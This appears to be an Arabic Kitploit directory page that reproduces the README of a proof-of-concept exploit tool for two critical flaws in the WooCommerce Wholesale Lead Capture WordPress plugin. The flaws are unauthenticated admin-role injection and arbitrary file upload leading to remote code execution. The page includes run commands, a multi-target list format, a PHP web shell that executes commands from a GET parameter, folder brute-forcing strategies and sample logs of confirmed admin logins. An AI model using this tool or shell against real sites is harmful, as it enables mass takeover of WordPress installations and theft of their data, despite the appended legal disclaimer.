Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-27542-CVE-2026-27540- — امتياز غير مُصادَق عليه | رفع ملفات تعسفي غير مُصادَق عليه | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

امتياز غير مُصادَق عليه | رفع ملفات تعسفي غير مُصادَق عليه

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
26منذ 4 أشهرلم تتم المراجعة بعد

Typing SVG


🔴 نظرة عامة على الثغرات

CVE-2026-27542 — تصعيد امتيازات دون مصادقة

الوصف:
إضافة WooCommerce Wholesale Lead Capture لنظام WordPress عرضة لثغرة تصعيد امتيازات دون مصادقة في جميع الإصدارات المتأثرة المعروفة. تكمن الثغرة داخل معالج إجراء AJAX wwlc_create_user، الذي يعالج طلبات تسجيل المستخدمين دون تنقية أو تحقق كافٍ من حقول الأدوار المقدمة من المستخدم. يمكن لمهاجم بعيد غير مصادق صياغة طلب POST مخصص يحقن حقول قدرات WordPress عشوائية — بما في ذلك wp_capabilities[administrator] — مباشرة في بيانات المستخدم الوصفية (user metadata) وقت إنشاء الحساب. يتيح ذلك للمهاجم تسجيل نفسه كمسؤول WordPress دون أي مصادقة مسبقة أو تفاعل من مستخدم شرعي، مما يؤدي إلى اختراق كامل لتثبيت WordPress المتأثر.


CVE-2026-27540 — رفع ملفات تعسّفي دون مصادقة

الوصف:
إضافة WooCommerce Wholesale Lead Capture لنظام WordPress عرضة لثغرة رفع ملفات تعسّفي دون مصادقة في جميع الإصدارات المتأثرة المعروفة. تكمن الثغرة في إجراء AJAX wwlc_file_upload_handler، الذي يُسجَّل دون أي اشتراط للمصادقة أو التحقق من nonce. من خلال إرسال طلب POST متعدد الأجزاء (multipart) مخصص إلى /wp-admin/admin-ajax.php، يمكن لمهاجم بعيد غير مصادق رفع ملفات من أي نوع — بما في ذلك قشرة ويب PHP — إلى دليل wp-content/uploads/ على الخادم داخل مجلد فرعي مولّد ديناميكيًا باسم wwlc-temp-*. يؤدي الاستغلال الناجح إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على خادم الويب الأساسي الذي يعمل بحساب مستخدم عملية الويب.


🛠️ وصف الأداة

هذا برنامج إثبات مفهوم (PoC) لاستغلال الثغرتين الحرجتين الموصوفتين أعلاه، ويستهدف تثبيتات WordPress التي تشغّل إضافة WooCommerce Wholesale Lead Capture. تدعم الأداة وضعَي هجوم مستقلين:

الوضعنوع الهجومالهدف
الوضع 1رفع ملفات تعسّفي دون مصادقة + اكتشاف المجلدات بالقوة الغاشمةرفع قشرة ويب PHP وتحديد موقعها عبر تخمين المجلدات متعدد الطبقات
الوضع 2تصعيد امتيازات دون مصادقة عبر التسجيلتسجيل النفس كمسؤول WordPress والتحقق من الوصول الإداري

📋 المتطلبات

متطلبات النظام

  • Python 3.8 أو أحدث
  • وصول إلى الإنترنت للهدف (الأهداف)
  • Linux / Windows / macOS

تبعيات Python

root@kitploit:~
pip install requests urllib3 colorama

أو التثبيت عبر ملف المتطلبات:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ الاستخدام

التشغيل الأساسي

root@kitploit:~
python3 CVE-2026-27542_CVE-2026-27540.py

تعرض الأداة واجهة طرفية تفاعلية. سيُطلب منك إدخال جميع المعاملات المطلوبة.


🗂️ صيغة قائمة الأهداف

أنشئ ملفًا نصيًا بسيطًا (مثل list.txt) يحتوي على عنوان URL هدف واحد في كل سطر:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 الوضع 1 — رفع الملفات + القوة الغاشمة للمجلدات

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

مثال ملف القشرة (shell.php):

root@kitploit:~
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

ملاحظة: يتم إنشاء مجلد wwlc-temp-* ديناميكيًا بواسطة الإضافة باستخدام دالة PHP uniqid('wwlc-temp-'). تستخدم الأداة استراتيجية قوة غاشمة متعددة الطبقات لاكتشافه:


🟠 الوضع 2 — التسجيل + حقن الدور + التحقق من الإدارة

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

تقوم الأداة بما يلي:

  1. تكتشف نموذج تسجيل WWLC وتستخرج nonce صالحًا
  2. ترسل حمولة تسجيل مخصصة تحقن دور administrator
  3. تحاول تسجيل الدخول ببيانات الاعتماد المنشأة
  4. تتحقق من الوصول إلى لوحة الإدارة عبر عدة نقاط نهاية إدارية في WordPress
  5. تحفظ نتائج الإدارة المؤكدة في ملف الإخراج

📁 ملفات الإخراج

الملفالوصف
scan_results/wwlc_uploads.txt

نموذج الإخراج (الوضع 2 — وصول إداري مؤكد)

root@kitploit:~
[INFO]    Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO]    https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2

نموذج الإخراج (الوضع 1 — العثور على قشرة)

root@kitploit:~
[INFO]    Mode1 | Target: https://target.com
[INFO]    https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO]    https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO]    https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s

📡 التواصل والمؤلف

بواسطة: Nxploited (خالد العنزي)

 


⚠️ إخلاء المسؤولية القانوني

هذه الأداة مُقدمة لأغراض التعليم والبحث الأمني المصرح به فقط.

لا يقرّ المؤلف، Nxploited (خالد العنزي)، وجميع المساهمين في هذا المشروع، بإساءة استخدام هذه الأداة ولا يدعمونها ولا يتحملون أي مسؤولية عن أي ضرر ناتج عن استخدام هذا البرنامج ضد أنظمة ليس لديك إذن كتابي صريح لاختبارها.

  • ✅ مسموح: الاستخدام على الأنظمة التي تملكها أو حصلت على إذن كتابي صريح لاختبارها.
  • ❌ محظور: الاستخدام ضد أي أنظمة دون إذن كتابي صريح مسبق من مالك النظام.

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني ويُعاقَب عليه بموجب القوانين المعمول بها بما في ذلك على سبيل المثال لا الحصر قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA)، وقانون إساءة استخدام الكمبيوتر (CMA)، وما يعادلها من تشريعات حول العالم.

باستخدامك لهذه الأداة، فإنك تتحمل المسؤولية الكاملة عن أفعالك وتؤكد أن لديك السلطة القانونية لاختبار الأنظمة المستهدفة.

لا يتحمل المؤلف أي مسؤولية على الإطلاق عن أي أضرار مباشرة أو غير مباشرة أو عرضية أو تبعية تنشأ عن استخدام أو إساءة استخدام هذا البرنامج.


© 2026 Nxploited (خالد العنزي) — لأغراض البحث الأمني المصرح به فقط.

تنزيل الأداة
الحقلالتفاصيل
معرّف CVECVE-2026-27542
الخطورةحرِجة — درجة CVSS v3.1: 9.8
المتجهCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
المكوّن المتأثرإضافة WooCommerce Wholesale Lead Capture (WWLC) لنظام WordPress
نوع الثغرةتصعيد امتيازات دون مصادقة
المصادقة المطلوبةلا شيء
CWECWE-269: إدارة امتيازات غير سليمة
الحقلالتفاصيل
معرّف CVECVE-2026-27540
الخطورةحرِجة — درجة CVSS v3.1: 9.8
المتجهCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
المكوّن المتأثرإضافة WooCommerce Wholesale Lead Capture (WWLC) لنظام WordPress
نوع الثغرةرفع ملفات تعسّفي دون مصادقة (يؤدي إلى تنفيذ تعليمات برمجية عن بُعد)
المصادقة المطلوبةلا شيء
CWECWE-434: رفع ملف غير مقيد من نوع خطير
الطبقةالاستراتيجيةالوصف
0سرد الدليلمحاولة سرد دليل uploads إذا كان مفتوحًا
1مبنية على الأنماطتخمينات رقمية مشتقة من الوقت ومتسلسلة
2Hex مبني على الوقتمُستندة إلى الطوابع الزمنية لطلبات HTTP المرصودة
3Hex عشوائيتخمين سلاسل hex عشوائية بحتة
جميع المواقع التي نجح فيها رفع الملفات (الوضع 1)
scan_results/wwlc_shells_found.txtروابط القشور الكاملة التي تأكد إمكانية الوصول إليها (الوضع 1)
scan_results/wwlc_register_results.txtجميع نتائج محاولات التسجيل مع بيانات الاعتماد (الوضع 2)
scan_results/Admin_login.txtتسجيلات دخول الإدارة المؤكدة مع بيانات الاعتماد (الوضع 2)